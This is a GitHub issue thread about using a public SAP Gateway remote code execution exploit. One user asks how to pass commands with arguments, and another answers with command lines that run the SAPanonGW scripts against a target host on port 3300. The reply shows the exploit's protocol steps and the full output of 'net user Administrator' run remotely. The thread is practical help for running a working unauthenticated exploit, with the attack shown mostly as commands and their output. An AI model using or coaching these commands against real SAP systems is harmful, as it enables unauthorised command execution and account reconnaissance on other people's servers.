chipik/SAP_GW_RCE_exploit

Commands with space

Opened this issue · 1 comments

vsegdacocacola commented

I am currently playing with exploit.
One word commands are working perfectly, but when I am trying to run commands with parameters, it seems it ignores them. For example, whoami returns me username, but whoami --help also return username.

Is it possible to encode command string to pass also parameters after space?

randomstr1ng commented

Hi @vsegdacocacola,
for me it works, when I try to send e.g. "net user Administrator" or "whoami /all"

Example 1:

python SAPanonGWv2.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[INFO ] [+] Sending GW_NORMAL_CLIENT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_INIT
[INFO ] Response: OK
[INFO ] [+] Sending F_SAP_SEND
[INFO ] [+] Sending F_SAP_SEND2
User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            30.03.2015 10:01:34
Password expires             11.05.2015 10:01:34
Password changeable          30.03.2015 10:01:34
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   30.03.2015 14:04:06

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

Example 2:

python SAPanonGWv1.py -t 172.20.10.100 -c "net user Administrator" -p 3300
[*] sending cmd:net user Administrator
User name                    Administrator

Full Name
TComment                      Built-in account for administering the computer/domain
User's comment
2Country/region code          000 (System Default)
!Account active               Yes
#Account expires              Never

1Password last set            30.03.2015 10:01:34
1Password expires             11.05.2015 10:01:34
1Password changeable          30.03.2015 10:01:34
!Password required            Yes
!User may change password     Yes

!Workstations allowed         All
Logon script
User profile
Home directory
1Last logon                   30.03.2015 14:04:06

!Logon hours allowed          All

-Local Group Memberships      *Administrators
#Global Group memberships     *None
$The command completed successfully.

The Quotes did the trick for me. Maybe this will help you.